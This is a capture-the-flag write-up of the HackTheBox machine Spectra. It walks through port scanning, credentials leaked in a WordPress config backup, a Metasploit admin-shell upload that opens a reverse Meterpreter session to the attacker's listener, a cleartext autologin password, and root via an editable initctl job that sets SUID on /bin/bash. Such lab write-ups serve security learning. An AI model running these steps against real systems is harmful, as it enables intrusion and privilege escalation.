Spectra | HackTheBox Writeup

Overview

Spectra is an easy Linux-based machine in HackTheBox by egre55

User Part

Start with Nmap scan found 4 open ports

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-20 12:20 EDT
Nmap scan report for spectra.htb (10.10.10.229)
Host is up (0.23s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey:
|_ 4096 52:47:de:5c:37:4f:29:0e:8e:1d:88:6e:f9:23:4d:5a (RSA)
80/tcp open http nginx 1.17.4
|_http-server-header: nginx/1.17.4
|_http-title: Site doesn't have a title (text/html).
3306/tcp open mysql MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
8081/tcp open blackice-icecap?
| fingerprint-strings:
| FourOhFourRequest, GetRequest:
| HTTP/1.1 200 OK
| Content-Type: text/plain
| Date: Sun, 20 Jun 2021 16:20:33 GMT
| Connection: close
| Hello World
| HTTPOptions:
| HTTP/1.1 200 OK
| Content-Type: text/plain
| Date: Sun, 20 Jun 2021 16:20:40 GMT
| Connection: close
|_ Hello World
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8081-TCP:V=7.91%I=7%D=6/20%Time=60CF6AD1%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,71,"HTTP/1\.1\x20200\x20OK\r\nContent-Type:\x20text/plain\r\nD
SF:ate:\x20Sun,\x2020\x20Jun\x202021\x2016:20:33\x20GMT\r\nConnection:\x20
SF:close\r\n\r\nHello\x20World\n")%r(FourOhFourRequest,71,"HTTP/1\.1\x2020
SF:0\x20OK\r\nContent-Type:\x20text/plain\r\nDate:\x20Sun,\x2020\x20Jun\x2
SF:02021\x2016:20:33\x20GMT\r\nConnection:\x20close\r\n\r\nHello\x20World\
SF:n")%r(HTTPOptions,71,"HTTP/1\.1\x20200\x20OK\r\nContent-Type:\x20text/p
SF:lain\r\nDate:\x20Sun,\x2020\x20Jun\x202021\x2016:20:40\x20GMT\r\nConnec
SF:tion:\x20close\r\n\r\nHello\x20World\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 178.93 ms 10.10.14.1
2 349.92 ms spectra.htb (10.10.10.229)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.02 seconds

The website is for issue tracking and it’s not configured.

checking the source code reveals the DNS name.

I added to /etc/hosts.

<-->
<h2><a href="http://spectra.htb/main/index.php" target="mine">Software Issue Tracker</a></h2>
<h2><a href="http://spectra.htb/testing/index.php" target="mine">Test</a></h2>
<-->

website shows,it’s a WordPress site.

I checked with wpscan, but nothing found interesting other than username.

Running ffuz shows 2 directories.

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://spectra.htb/FUZZ

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v1.3.0-dev
________________________________________________

:: Method : GET
:: URL : http://spectra.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/big.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________

main [Status: 301, Size: 169, Words: 5, Lines: 8]
testing [Status: 301, Size: 169, Words: 5, Lines: 8]
:: Progress: [20475/20475] :: Job [1/1] :: 177 req/sec :: Duration: [0:02:01] :: Errors: 0 ::

That directory returns these files.

let’s check the config file.

Index of /testing/

../
wp-admin/ 10-Jun-2020 23:00 -
wp-content/ 10-Jun-2020 23:13 -
wp-includes/ 10-Jun-2020 23:13 -
index.php 06-Feb-2020 06:33 405
license.txt 10-Jun-2020 23:12 19915
readme.html 10-Jun-2020 23:12 7278
wp-activate.php 06-Feb-2020 06:33 6912
wp-blog-header.php 06-Feb-2020 06:33 351
wp-comments-post.php 02-Jun-2020 20:26 2332
wp-config.php 28-Oct-2020 05:52 2997
wp-config.php.save 29-Jun-2020 22:08 2888
wp-cron.php 06-Feb-2020 06:33 3940
wp-links-opml.php 06-Feb-2020 06:33 2496
wp-load.php 06-Feb-2020 06:33 3300
wp-login.php 10-Feb-2020 03:50 47874
wp-mail.php 14-Apr-2020 11:34 8509
wp-settings.php 10-Apr-2020 03:59 19396
wp-signup.php 06-Feb-2020 06:33 31111
wp-trackback.php 06-Feb-2020 06:33 4755
xmlrpc.php 06-Feb-2020 06:33 3133

wp-config.php and wp-config.php.save doesn’t show anything

But,in wp-config.php.save  source code, it shows username and password

<-->

/** MySQL database username */
define( 'DB_USER', 'devtest' );

/** MySQL database password */
define( 'DB_PASSWORD', 'devteam01' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

<-->

I login to the dashboard with the help of wpscan username and this password

I used Metasploit to get wp_admin shell

msf6 > use exploit/unix/webapp/wp_admin_shell_upload 


msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS spectra.thm
RHOSTS => spectra.thm
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /main/
TARGETURI => /main/
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set username administrator
username => administrator
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set password devteam01
password => devteam01
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST 10.10.14.32
LHOST => 10.10.14.32
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit

[-] Exploit failed: One or more options failed to validate: RHOSTS.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 10.10.10.229
RHOSTS => 10.10.10.229
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit

[*] Started reverse TCP handler on 10.10.14.32:4444
[*] Authenticating with WordPress using administrator:devteam01...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /main/wp-content/plugins/pkfCHkQzWW/afpmMkJCbG.php...
[*] Sending stage (39282 bytes) to 10.10.10.229
[+] Deleted afpmMkJCbG.php
[+] Deleted pkfCHkQzWW.php
[+] Deleted ../pkfCHkQzWW
[*] Meterpreter session 1 opened (10.10.14.32:4444 -> 10.10.10.229:38918) at 2021-06-20 14:45:53 -0400

meterpreter >

I uploaded linpeas and checking for the privilege escalation I got this. the password is in cleartext.

[+] Autologin Files
/home/nginx/.pki/nssdb/key4.dbn/etc/autologin

/etc/autologin/passwd
-rw-r--r-- 1 root root 19 Feb 3 16:43 /etc/autologin/passwd
SummerHereWeCome!!

/etc/init/autologin.conf
-rw-r--r-- 1 root root 978 Feb 3 16:42 /etc/init/autologin.conf

Using that password i can login to katie

ssh katie@10.10.10.229 255 
Password:
katie@spectra ~ $

Root Part

Then i checked that which commands i can run with root privilege and I got this

katie@spectra ~ $ sudo -l
User katie may run the following commands on spectra:
(ALL) SETENV: NOPASSWD: /sbin/initctl
katie@spectra ~ $

I searched for initctl privilege escalation in google and got this article

As per the article, I checked the current status of services using list.

katie@spectra /etc/init $ sudo /sbin/initctl list
crash-reporter-early-init stop/waiting
cups-clear-state stop/waiting
dbus_session stop/waiting
failsafe-delay stop/waiting
fwupdtool-activate stop/waiting
send-reclamation-metrics stop/waiting
smbproviderd stop/waiting
tpm_managerd start/running, process 818
udev start/running, process 240
test stop/waiting
test1 stop/waiting
autologin stop/waiting
boot-services start/running
cryptohome-proxy stop/waiting
cryptohomed-client stop/waiting

There is a test.conf service so i edited that

I started the service

katie@spectra /etc/init $ sudo /sbin/initctl start test

test start/running, process 3936

katie@spectra /etc/init $

After starting the service I got the output.

now I can run /bin/bash as root.

katie@spectra /etc/init $ ls -la /bin/bash
-rwsr-sr-x 1 root root 551984 Dec 22 05:46 /bin/bash
katie@spectra /etc/init $

i got root flag

katie@spectra /etc/init $ /bin/bash -p
bash-4.3# cat /root/root.txt
d44519713b889d5e1f9e536d0c6df2fc
bash-4.3#
 
Share on facebook
Share on twitter
Share on linkedin